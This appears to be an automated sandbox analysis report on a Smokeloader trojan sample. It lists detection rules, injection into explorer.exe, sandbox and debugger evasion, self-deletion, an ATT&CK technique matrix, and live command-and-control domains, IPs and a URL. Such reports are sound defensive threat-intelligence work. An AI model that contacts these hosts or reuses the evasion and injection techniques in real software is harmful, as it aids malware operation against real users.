      Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@61/2
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00514696 CreateToolhelp32Snapshot,Module32First,0_2_00514696
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbirvceJump to behavior
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Program Files\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeReversingLabs: Detection: 73%
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeVirustotal: Detection: 60%
      Source: unknownProcess created: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe "C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\vbirvce C:\Users\user\AppData\Roaming\vbirvce
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeUnpacked PE file: 0.2.50f86ebddd156619b173883981364d8955365d76d2c3a.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.guj:R;.ber:R;.medajim:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\vbirvceUnpacked PE file: 5.2.vbirvce.400000.0.unpack .text:ER;.rdata:R;.data:W;.guj:R;.ber:R;.medajim:W;.rsrc:R; vs .text:EW;
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeStatic PE information: section name: .guj
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeStatic PE information: section name: .ber
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exeStatic PE information: section name: .medajim
      Source: vbirvce.1.drStatic PE information: section name: .guj
      Source: vbirvce.1.drStatic PE information: section name: .ber
      Source: vbirvce.1.drStatic PE information: section name: .medajim
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_005180EF push esp; ret 0_2_005180F1
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00516492 push B63524ADh; retn 001Fh0_2_005164C9
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00516F8F pushfd ; iretd 0_2_00516F90
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00621540 pushad ; ret 0_2_00621550
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_006C1540 pushad ; ret 5_2_006C1550
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00716F17 push esp; ret 5_2_00716F19
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00715DB7 pushfd ; iretd 5_2_00715DB8
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_007152BA push B63524ADh; retn 001Fh5_2_007152F1
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbirvceJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbirvceJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vbirvce:Zone.Identifier read attributes | deleteJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\vbirvceAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\vbirvceAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe, 00000000.00000002.1763562549.00000000004EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKJ3
      Source: vbirvce, 00000005.00000002.1996803380.00000000006EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 466Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3826Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 934Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 351Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 366Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 742Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6344Thread sleep count: 466 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6624Thread sleep count: 3826 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6624Thread sleep time: -382600s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6436Thread sleep count: 934 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6436Thread sleep time: -93400s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4476Thread sleep count: 319 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5236Thread sleep count: 351 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5236Thread sleep time: -35100s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5408Thread sleep count: 366 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5408Thread sleep time: -36600s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6624Thread sleep count: 742 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6624Thread sleep time: -74200s >= -30000sJump to behavior
      Source: explorer.exe, 00000001.00000000.1746429995.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1746429995.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
      Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1746429995.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1745872183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1746429995.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1744130218.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1745872183.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00513F73 push dword ptr fs:[00000030h]0_2_00513F73
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_0062092B mov eax, dword ptr fs:[00000030h]0_2_0062092B
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeCode function: 0_2_00620D90 mov eax, dword ptr fs:[00000030h]0_2_00620D90
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_006C092B mov eax, dword ptr fs:[00000030h]5_2_006C092B
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_006C0D90 mov eax, dword ptr fs:[00000030h]5_2_006C0D90
      Source: C:\Users\user\AppData\Roaming\vbirvceCode function: 5_2_00712D9B push dword ptr fs:[00000030h]5_2_00712D9B

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: vbirvce.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 116.58.10.60 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 123.213.233.131 80Jump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeThread created: C:\Windows\explorer.exe EIP: 8EF19A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceThread created: unknown EIP: 87C19A8Jump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\vbirvceSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1743880705.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1742735629.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1742931435.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping511
      Security Software Discovery
      Remote ServicesData from Local System2
      Non-Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory12
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media112
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials12
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1537536 Sample: 50f86ebddd156619b1738839813... Startdate: 19/10/2024 Architecture: WINDOWS Score: 100 21 unicea.ws 2->21 23 tech-servers.in.net 2->23 25 nwgrus.ru 2->25 31 Multi AV Scanner detection for domain / URL 2->31 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 7 other signatures 2->37 7 50f86ebddd156619b173883981364d8955365d76d2c3a.exe 2->7         started        10 vbirvce 2->10         started        signatures3 process4 signatures5 39 Detected unpacking (changes PE section rights) 7->39 41 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->41 43 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->43 51 4 other signatures 7->51 12 explorer.exe 59 3 7->12 injected 45 Antivirus detection for dropped file 10->45 47 Multi AV Scanner detection for dropped file 10->47 49 Machine Learning detection for dropped file 10->49 process6 dnsIp7 27 unicea.ws 123.213.233.131, 49736, 49926, 49933 SKB-ASSKBroadbandCoLtdKR Korea Republic of 12->27 29 116.58.10.60, 50034, 50035, 50036 NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK Pakistan 12->29 17 C:\Users\user\AppData\Roaming\vbirvce, PE32 12->17 dropped 19 C:\Users\user\...\vbirvce:Zone.Identifier, ASCII 12->19 dropped 53 System process connects to network (likely due to code injection or exploit) 12->53 55 Benign windows process drops PE files 12->55 57 Deletes itself after installation 12->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->59 file8 signatures9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      50f86ebddd156619b173883981364d8955365d76d2c3a.exe74%ReversingLabsWin32.Trojan.Smokeloader
      50f86ebddd156619b173883981364d8955365d76d2c3a.exe60%VirustotalBrowse
      50f86ebddd156619b173883981364d8955365d76d2c3a.exe100%AviraHEUR/AGEN.1310247
      50f86ebddd156619b173883981364d8955365d76d2c3a.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\vbirvce100%AviraHEUR/AGEN.1310247
      C:\Users\user\AppData\Roaming\vbirvce100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\vbirvce74%ReversingLabsWin32.Trojan.Smokeloader
      No Antivirus matches
      SourceDetectionScannerLabelLink
      unicea.ws11%VirustotalBrowse
      nwgrus.ru12%VirustotalBrowse
      tech-servers.in.net4%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://aka.ms/odirmr0%URL Reputationsafe
      https://aka.ms/odirmr0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
      https://api.msn.com/q0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://wns.windows.com/L0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
      https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://outlook.com_0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      unicea.ws
      123.213.233.131
      truetrueunknown
      tech-servers.in.net
      unknown
      unknowntrueunknown
      nwgrus.ru
      unknown
      unknowntrueunknown
      NameMaliciousAntivirus DetectionReputation
      http://unicea.ws/tmp/index.phptrue
        unknown
